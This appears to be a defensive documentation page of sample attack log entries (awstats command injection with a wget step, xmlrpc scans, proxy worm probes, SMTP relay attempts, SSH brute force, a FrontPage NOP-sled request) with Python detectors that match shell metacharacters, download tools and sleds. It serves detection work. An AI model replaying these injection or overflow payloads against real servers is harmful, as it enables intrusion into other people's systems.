Samples of logs that contain information about attacks

Nessus scan entries in a web server log:

Nessus Scan in a web server log

Latest application scans:

Apache attack samples

Apache entry in which the command execution succeeded (awstats ``configdir`` injection):

.. code-block:: console

   a.b.c.d - - [13/Jan/2006:01:07:21 -0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget...;echo%20YYY;echo|HTTP/1.0" 404 291

Apache scan (looking for vulnerable applications):

.. code-block:: console

   100.149.117.1 - - [13/Jan/2006:01:03:30 -0200] "POST /blog/xmlrpc.php HTTP/1.0" 404 288
   100.149.117.1 - - [13/Jan/2006:01:03:31 -0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 295
   100.149.117.1 - - [13/Jan/2006:01:03:32 -0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 296
   100.149.117.1 - - [13/Jan/2006:01:03:33 -0200] "POST /drupal/xmlrpc.php HTTP/1.0" 404 290

Squid access log (worm scans):

.. code-block:: console

   524 192.168.2.204 TCP_MISS/404 590 GET http://www.ordendeslichts.de/intern/xxx3.php? - DIRECT/81.201.107.6 text/html
   3571 192.168.2.204 TCP_MISS/404 470 GET http://www.levada.ru/htmlarea/images/xxx3.php? - DIRECT/62.118.252.213
   1 192.168.2.204 TCP_NEGATIVE_HIT/404 487 GET http://ala-bg.net/444.php - NONE/- text/html
   1 192.168.2.204 TCP_NEGATIVE_HIT/404 396 GET http://www.connectesl.com/444.php - NONE/- text/html
   1 192.168.2.204 TCP_NEGATIVE_HIT/404 543 GET http://www.chilotitomarino.cl/444.php - NONE/- text/html
   0 192.168.2.204 TCP_NEGATIVE_HIT/404 543 GET http://www.chilotitomarino.cl/444.php - NONE/- text/html

Squid proxy misuse (attempt to relay SMTP through the proxy):

.. code-block:: console

   0 192.168.2.135 TCP_DENIED/403 1382 CONNECT 65.54.245.104:25 - NONE/- text/html
   2 192.168.2.135 TCP_DENIED/403 1378 CONNECT 4.79.181.14:25 - NONE/- text/html
   0 192.168.2.135 TCP_DENIED/403 1390 GET http://www.ebay.com/ - NONE/- text/html
   0 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html
   8 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html
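The two Squid samples above (a client probing the same script name on many unrelated hosts, and clients asking the proxy to CONNECT to port 25) can be picked out of the native access.log format with one small parser. The following is an added Python example, not code from the original page or from Squid; the allowed-port policy, the three-host threshold and the benign lines in the sample log are assumptions, and the sample log is constructed from the entries shown above.

```python
import re
from collections import defaultdict
from typing import NamedTuple
from urllib.parse import urlsplit

# Squid native access.log fields as they appear in the samples above
# (elapsed-ms first; the leading UNIX timestamp is absent from these samples):
#   elapsed client code/status bytes method url ident hierarchy/peer [type]
SQUID_RE = re.compile(
    r'^(?P<elapsed>\d+) (?P<client>\S+) (?P<code>\S+)/(?P<status>\d{3}) (?P<bytes>\d+) '
    r'(?P<method>[A-Z]+) (?P<url>\S+) (?P<ident>\S+) (?P<hier>\S+)(?: (?P<type>\S+))?'
)
ALLOWED_CONNECT_PORTS = {443}   # assumed policy: CONNECT is only for TLS
SCAN_MIN_HOSTS = 3              # assumed threshold, not from the page


class Finding(NamedTuple):
    client: str
    kind: str
    detail: str


def parse_squid(line):
    """Return the fields of one native-format line, or None if it does not parse."""
    m = SQUID_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def connect_port(target):
    """Port of a CONNECT target such as '65.54.245.104:25', or None if absent."""
    _, _, port = target.rpartition(':')
    return int(port) if port.isdigit() else None


def analyze(lines):
    findings = []
    probes = defaultdict(lambda: defaultdict(set))   # client -> script name -> hosts probed
    for line in lines:
        rec = parse_squid(line)
        if rec is None:
            continue
        if rec['method'] == 'CONNECT':
            port = connect_port(rec['url'])
            if port not in ALLOWED_CONNECT_PORTS:
                kind = 'smtp_relay_attempt' if port == 25 else 'connect_nonstandard_port'
                findings.append(Finding(rec['client'], kind, rec['url']))
            continue
        if rec['status'] == 404:
            parts = urlsplit(rec['url'])
            script = parts.path.rsplit('/', 1)[-1]
            if script and parts.hostname:
                probes[rec['client']][script].add(parts.hostname)
    # Worm heuristic: the same script name requested (and missing) on several
    # unrelated hosts from one client, as with 444.php in the sample above.
    for client, by_script in probes.items():
        for script, hosts in by_script.items():
            if len(hosts) >= SCAN_MIN_HOSTS:
                findings.append(Finding(client, 'worm_scan', f'{script} probed on {len(hosts)} hosts'))
    return findings


# Constructed sample: the entries shown on this page plus two benign lines.
SAMPLE_LOG = [
    '524 192.168.2.204 TCP_MISS/404 590 GET http://www.ordendeslichts.de/intern/xxx3.php? - DIRECT/81.201.107.6 text/html',
    '3571 192.168.2.204 TCP_MISS/404 470 GET http://www.levada.ru/htmlarea/images/xxx3.php? - DIRECT/62.118.252.213',
    '1 192.168.2.204 TCP_NEGATIVE_HIT/404 487 GET http://ala-bg.net/444.php - NONE/- text/html',
    '1 192.168.2.204 TCP_NEGATIVE_HIT/404 396 GET http://www.connectesl.com/444.php - NONE/- text/html',
    '1 192.168.2.204 TCP_NEGATIVE_HIT/404 543 GET http://www.chilotitomarino.cl/444.php - NONE/- text/html',
    '0 192.168.2.204 TCP_NEGATIVE_HIT/404 543 GET http://www.chilotitomarino.cl/444.php - NONE/- text/html',
    '0 192.168.2.135 TCP_DENIED/403 1382 CONNECT 65.54.245.104:25 - NONE/- text/html',
    '2 192.168.2.135 TCP_DENIED/403 1378 CONNECT 4.79.181.14:25 - NONE/- text/html',
    '0 192.168.2.135 TCP_DENIED/403 1390 GET http://www.ebay.com/ - NONE/- text/html',
    '0 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html',
    '8 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html',
    '12 10.0.0.7 TCP_MISS/200 2345 CONNECT www.example.com:443 - DIRECT/93.184.216.34 -',
    '40 10.0.0.7 TCP_MISS/200 5120 GET http://www.example.com/ - DIRECT/93.184.216.34 text/html',
]

if __name__ == '__main__':
    for f in analyze(SAMPLE_LOG):
        print(f'{f.client:15} {f.kind:24} {f.detail}')
```

Note that the worm heuristic keys on the script name rather than the full URL: the whole point of the sample is that ``444.php`` is requested from several hosts that have nothing to do with each other, which a per-URL counter would never notice. With the threshold at three hosts, ``xxx3.php`` (two hosts) stays below the line; lower it to two if you prefer earlier, noisier alerts.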

SSH brute-force login:

.. code-block:: console

   Oct  2 01:13:19 host sshd[19618]: Illegal user test from ::ffff:69.10.144.194
   Oct  2 01:13:19 host sshd[19618]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!
   Oct  2 01:13:20 host sshd[19620]: Illegal user test from ::ffff:69.10.144.194
   Oct  2 01:13:20 host sshd[19620]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!
   Oct  2 01:13:22 host sshd[19622]: Illegal user test from ::ffff:69.10.144.194
   Oct  2 01:13:22 host sshd[19622]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!
   Oct  2 01:13:23 host sshd[19624]: Illegal user tester from ::ffff:69.10.144.194
   Oct  2 01:13:23 host sshd[19624]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!
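The sshd sample above carries two signals worth separating: repeated "Illegal user" failures from one source inside a few seconds, and the reverse-DNS mismatch warning that sshd prints for the same address. The following is an added Python example, not code from the original page or from OpenSSH; the window, threshold and year are assumed tuning values, the "Invalid user" / "Failed password" patterns are the forms newer OpenSSH releases log, and the sample log is constructed from the entries shown above plus a few extra lines.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import NamedTuple

# syslog line as written by sshd: "Mon DD HH:MM:SS host sshd[pid]: message"
SYSLOG_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: (?P<msg>.*)$'
)
# Failed-login messages: the old "Illegal user" form shown above, the
# "Invalid user" form of newer OpenSSH, and "Failed password ..." lines.
FAILURE_RES = [
    re.compile(r'^(?:Illegal|Invalid) user (?P<user>\S+) from (?P<src>\S+)'),
    re.compile(r'^Failed (?:password|publickey) for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)'),
]
DNS_MISMATCH_RE = re.compile(r'^Address (?P<src>\S+) maps to (?P<name>\S+), but this does not map back')
ASSUMED_YEAR = 2006             # syslog timestamps carry no year; assumed for the sample
WINDOW = timedelta(seconds=30)  # assumed tuning values, not from the page
THRESHOLD = 4


class Alert(NamedTuple):
    src: str
    kind: str
    detail: str


def normalize_ip(addr):
    """Strip the IPv4-mapped prefix so ::ffff:69.10.144.194 and 69.10.144.194 count as one source."""
    return addr[7:] if addr.startswith('::ffff:') else addr


def parse_event(line):
    """Return (kind, timestamp, source, detail) for a failure or DNS-mismatch line, else None."""
    m = SYSLOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m['ts'], '%b %d %H:%M:%S').replace(year=ASSUMED_YEAR)
    msg = m['msg']
    for rx in FAILURE_RES:
        f = rx.match(msg)
        if f:
            return ('auth_failure', ts, normalize_ip(f['src']), f['user'])
    d = DNS_MISMATCH_RE.match(msg)
    if d:
        return ('dns_mismatch', ts, normalize_ip(d['src']), d['name'])
    return None


def analyze(lines):
    alerts = []
    recent = defaultdict(deque)   # src -> timestamps of failures inside WINDOW
    users = defaultdict(set)      # src -> usernames tried
    reported = set()              # (src, kind) pairs already alerted on
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        kind, ts, src, detail = ev
        if kind == 'dns_mismatch':
            if (src, kind) not in reported:
                reported.add((src, kind))
                alerts.append(Alert(src, 'reverse_dns_mismatch', f'claims to be {detail}'))
            continue
        q = recent[src]
        q.append(ts)
        users[src].add(detail)
        while ts - q[0] > WINDOW:   # slide the window forward
            q.popleft()
        if len(q) >= THRESHOLD and (src, 'bruteforce') not in reported:
            reported.add((src, 'bruteforce'))
            alerts.append(Alert(src, 'ssh_bruteforce',
                                f'{len(q)} failures in {WINDOW.seconds}s, users tried: {sorted(users[src])}'))
    return alerts


# Constructed sample: the entries shown on this page, two failures that stay
# below the threshold, and one successful login that must not be counted.
SAMPLE_LOG = [
    'Oct  2 01:13:19 host sshd[19618]: Illegal user test from ::ffff:69.10.144.194',
    'Oct  2 01:13:19 host sshd[19618]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!',
    'Oct  2 01:13:20 host sshd[19620]: Illegal user test from ::ffff:69.10.144.194',
    'Oct  2 01:13:20 host sshd[19620]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!',
    'Oct  2 01:13:22 host sshd[19622]: Illegal user test from ::ffff:69.10.144.194',
    'Oct  2 01:13:22 host sshd[19622]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!',
    'Oct  2 01:13:23 host sshd[19624]: Illegal user tester from ::ffff:69.10.144.194',
    'Oct  2 01:13:23 host sshd[19624]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!',
    'Oct  2 01:20:05 host sshd[19700]: Failed password for invalid user admin from 203.0.113.9 port 4022 ssh2',
    'Oct  2 01:20:09 host sshd[19702]: Failed password for invalid user admin from 203.0.113.9 port 4023 ssh2',
    'Oct  2 01:21:00 host sshd[19710]: Accepted publickey for alice from 192.0.2.10 port 51234 ssh2',
]

if __name__ == '__main__':
    for a in analyze(SAMPLE_LOG):
        print(f'{a.src:15} {a.kind:22} {a.detail}')
```

Two details matter more than the regexes. The source address is normalised before counting, because the "Illegal user" line reports the IPv4-mapped form ``::ffff:69.10.144.194`` while the DNS warning reports the bare IPv4 address, and a counter keyed on the raw string would split one attacker into two. And the DNS-mismatch warning is reported once per source rather than per line: it is corroborating context for the brute-force alert, not four separate incidents.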

Attempt to exploit FrontPage (payload truncated):

.. code-block:: console

   74.74.126.250 - - [02/Aug/2007:15:53:46 -0400] "SEARCH /\x90................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   ............................................................................................................................
   .....................................................................................\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
   x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
   90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
   0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
   x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
   90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
   0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
   x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
   90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
   0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
   x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
   0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 271

   74.74.126.250 - - [02/Aug/2007:15:54:17 -0400] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 406 288
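The three Apache samples on this page (the awstats command-injection entry, the xmlrpc.php scan and the FrontPage request above) are all visible in a plain access log without any packet capture. The following is an added Python example, not code from the original page or from any project it documents, that parses common-log-format lines and raises one finding per pattern; the shell-metacharacter list, the NOP-sled length and the scan window and threshold are assumed tuning values, and the sample log is constructed from the page's entries with the NOP sled shortened to 64 bytes and one benign request added.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple
from urllib.parse import unquote

# Apache access-log line in common log format; the extra referrer and
# user-agent fields of the combined format, if present, are simply ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?)(?: HTTP/\d\.\d)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Shell metacharacters and download tools in a (decoded) query string, as in
# the awstats configdir entry on this page.
SHELL_META_RE = re.compile(r'[|;`]|\b(?:wget|curl|chmod)\b', re.IGNORECASE)
# Apache writes non-printable request bytes as \xHH, so a long run of the
# literal text \x90 (x86 NOP) in the request line is the FrontPage sled.
NOP_SLED_RE = re.compile(r'(?:\\x90){16,}')
SCAN_WINDOW = timedelta(seconds=60)   # assumed tuning values, not from the page
SCAN_MIN_404 = 4


class Finding(NamedTuple):
    ip: str
    kind: str
    detail: str


def parse_line(line):
    """Return a dict of fields for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec


def analyze(lines):
    findings = []
    not_found = defaultdict(list)   # ip -> [(timestamp, target)] of 404 responses
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        target = rec['target']
        query = unquote(target.partition('?')[2])   # decode %XX before matching
        if SHELL_META_RE.search(query):
            findings.append(Finding(rec['ip'], 'command_injection', query))
        if NOP_SLED_RE.search(target):
            findings.append(Finding(rec['ip'], 'nop_sled', f"{rec['method']} request carries a NOP sled"))
        if rec['status'] == 404:
            not_found[rec['ip']].append((rec['ts'], target))

    # Scanner heuristic: one client collecting 404s for several distinct paths
    # inside a short window (the xmlrpc.php probes on this page).
    for ip, hits in not_found.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            paths = {t for ts, t in hits[i:] if ts - start <= SCAN_WINDOW}
            if len(paths) >= SCAN_MIN_404:
                findings.append(Finding(ip, 'scan', f'{len(paths)} distinct 404s within {SCAN_WINDOW.seconds}s'))
                break
    return findings


# Constructed sample: the entries shown on this page plus one benign request,
# with the NOP sled shortened to 64 bytes.
SAMPLE_LOG = [
    'a.b.c.d - - [13/Jan/2006:01:07:21 -0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget...;echo%20YYY;echo|HTTP/1.0" 404 291',
    '100.149.117.1 - - [13/Jan/2006:01:03:30 -0200] "POST /blog/xmlrpc.php HTTP/1.0" 404 288',
    '100.149.117.1 - - [13/Jan/2006:01:03:31 -0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 295',
    '100.149.117.1 - - [13/Jan/2006:01:03:32 -0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 296',
    '100.149.117.1 - - [13/Jan/2006:01:03:33 -0200] "POST /drupal/xmlrpc.php HTTP/1.0" 404 290',
    '74.74.126.250 - - [02/Aug/2007:15:53:46 -0400] "SEARCH /' + r'\x90' * 64 + '" 414 271',
    '74.74.126.250 - - [02/Aug/2007:15:54:17 -0400] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 406 288',
    '10.0.0.5 - - [13/Jan/2006:01:10:00 -0200] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == '__main__':
    for f in analyze(SAMPLE_LOG):
        print(f'{f.ip:15} {f.kind:18} {f.detail}')
```

The query string is percent-decoded before the metacharacter check, since ``%3b`` in the awstats entry is a ``;`` to the shell even though it never appears as one in the raw log line. The 404 heuristic is deliberately the last pass, after the whole input has been read, because a scan is a property of a group of lines rather than of any single one.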